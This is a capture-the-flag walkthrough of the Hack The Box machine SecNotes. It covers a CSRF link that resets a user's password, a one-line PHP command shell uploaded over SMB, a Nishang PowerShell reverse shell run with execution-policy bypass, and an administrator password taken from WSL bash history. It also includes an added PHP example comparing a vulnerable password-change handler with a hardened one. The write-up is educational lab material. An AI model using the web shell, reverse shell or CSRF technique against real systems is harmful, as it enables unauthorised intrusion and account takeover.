Hack The Box – SecNotes Walkthrough
Introduction
This was a very peculiar box: it involved sending a password-change link to a user from the web application in order to reset his password, uploading a PHP shell via SMB to gain remote code execution and therefore a shell, and using a password found in the underlying Linux system's bash history file to log in as the administrator user.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1,000 most common ports, using the following flags:
- -sC to run the default scripts
- -sV to enumerate application versions
A further Nmap scan with the -p- flag, which scans all ports, also finds port 8808:
Enumerating HTTP
When browsing to the web server, a login page is displayed.
The “Sign up now” link allows self-registration on the website.
This page is then displayed after logging in with the newly created user:
The “Contact Us” page allows sending messages to Tyler. The box could be set up so that Tyler follows links sent to him.
Creating a test file and hosting it with Python's built-in web server module:
Sending the link to the file to Tyler:
The request was received, which confirms the theory that Tyler will follow any link sent to him.
Hacking into Tyler’s account
An “Update Password” page is available.
Entering a new password, submitting the form and intercepting the request with Burp Suite shows that the new password is sent as a parameter, but neither the old password nor a unique user ID is included. This means that any user who follows the same link will have their password changed to the value it carries.
Sending Tyler a link to change his password to testtest:
Waiting a minute and then logging in as Tyler:
This worked and granted access to the web application as Tyler.
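The password-change request described above fails in two ways at once: the handler accepts the new value on any request, and it demands neither the current password nor a token tied to the victim's session, so a link is enough to change someone else's password. The following is an added example, not the SecNotes application's code: a minimal PHP handler with that defect beside a hardened version. The users table, its columns, the session array layout and the request field names are assumptions.

```php
<?php
// Added illustration, not the SecNotes application's source: a password-change
// handler with the weakness described above, beside a hardened version. Both
// take an open PDO handle and the caller's session array (an assumed shape).

// VULNERABLE: takes the new password from $_REQUEST (GET or POST alike) and asks
// for neither the current password nor a per-session token, so a link that the
// logged-in user merely follows is enough to replace their password.
function change_password_vulnerable(PDO $db, array $session, array $request): bool {
    $db->prepare('UPDATE users SET password = ? WHERE username = ?')
       ->execute([password_hash($request['password'], PASSWORD_DEFAULT), $session['username']]);
    return true;
}

// HARDENED: state changes only over POST, only with a CSRF token bound to this
// session (compared in constant time), and only after the current password is
// proven; the token is rotated so a captured value cannot be replayed.
function change_password_hardened(PDO $db, array &$session, array $post, string $method): bool {
    if ($method !== 'POST') {
        return false;
    }
    if (!isset($session['csrf_token'])
        || !hash_equals($session['csrf_token'], (string)($post['csrf_token'] ?? ''))) {
        return false;
    }
    $new = (string)($post['password'] ?? '');
    $stmt = $db->prepare('SELECT password FROM users WHERE username = ?');
    $stmt->execute([$session['username']]);
    $hash = $stmt->fetchColumn();
    if ($new === '' || $hash === false
        || !password_verify((string)($post['current_password'] ?? ''), $hash)) {
        return false;
    }
    $db->prepare('UPDATE users SET password = ? WHERE username = ?')
       ->execute([password_hash($new, PASSWORD_DEFAULT), $session['username']]);
    $session['csrf_token'] = bin2hex(random_bytes(32));
    return true;
}

// Self-contained demo against an in-memory SQLite database with constructed data.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)');
$db->prepare('INSERT INTO users VALUES (?, ?)')
   ->execute(['tyler', password_hash('original', PASSWORD_DEFAULT)]);
$session = ['username' => 'tyler', 'csrf_token' => bin2hex(random_bytes(32))];
// A followed link (GET, no token) succeeds on the weak handler and is rejected by the hardened one; only the user's own form submission passes.
var_dump(change_password_vulnerable($db, $session, ['password' => 'testtest']));
var_dump(change_password_hardened($db, $session, ['password' => 'newpass'], 'GET'));
var_dump(change_password_hardened($db, $session, ['csrf_token' => $session['csrf_token'],
    'current_password' => 'testtest', 'password' => 'newpass'], 'POST'));
```

The token is issued once per session when the form is rendered and placed in a hidden field; the weak handler's lack of that field and of a current-password prompt is exactly what the Burp capture above revealed.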
Exploiting open SMB share and IIS
On the web application there is a hint about what seems to be an SMB share, which includes a password.
Logging into the share with smbclient, using the -U flag to specify the user. The share seems to point to the root directory of a web server.
When looking at port 8808, the content seems to be the same as the share's.
Creating a PHP file containing the following code, which allows commands to be executed remotely:
<?php echo system($_REQUEST["cmd"]);?>
Uploading the file to the SMB share:
Sending commands through the cmd parameter executes them remotely. The current user appears to be Tyler.
Copying the Nishang PowerShell reverse shell script to the current directory:
Adding a call to the Invoke-PowerShellTcp function at the end of the script and amending the local IP address and port:
The next step is to set up a Netcat listener, which will catch the reverse shell when the victim host executes it, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
After uploading the PowerShell reverse shell via SMB, using the PHP shell to execute it:
powershell -ep bypass .\Shell.ps1
A callback is received, granting a reverse shell and remote access to the box.
Privilege Escalation
When enumerating common files and folders, an Ubuntu.zip file is found in the root directory. This suggests that the machine has Windows Subsystem for Linux (WSL) installed and may be running a Linux environment underneath.
After a bit of research, the root directory of the underlying Linux system can be found:
Navigating to the Linux system's folder, a password embedded in a command can be found in the bash history:
Knowing the administrator user's password, PsExec can be used to log in:
Conclusion
I quite liked this box as it tries to simulate a real-life scenario, where an attacker sends a maliciously-crafted link to an administrator user in order to gain access to the web application. The privilege escalation phase was quite unique as well, as WSL isn’t very common when doing CTF challenges.